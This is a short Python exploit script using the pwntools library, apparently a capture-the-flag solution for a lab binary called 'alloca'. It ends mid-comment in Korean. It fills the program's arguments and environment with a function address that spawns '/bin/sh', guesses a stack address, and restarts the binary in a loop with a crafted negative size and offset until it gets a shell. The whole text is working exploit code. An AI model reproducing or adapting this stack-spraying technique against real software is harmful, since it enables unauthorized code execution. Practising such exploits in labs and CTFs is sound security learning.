from pwn import * callme = 0x80485AB # system("/bin/sh") argvs = [p32(callme)*0x1000] env = {} for i in range(0x10): env[str(i)] = p32(callme)*0x7000 size = -80 # -92 ~ -77 stkaddr = 0xffcf5000 # guess stack address while True: p = process(executable="/home/alloca/alloca", env=env, argv=argvs) p.sendline(str(size)) p.sendline("-"+str(0x100000000-stkaddr)) sleep(4) # code 중간중간 sleep(1) 끼어있음, slee..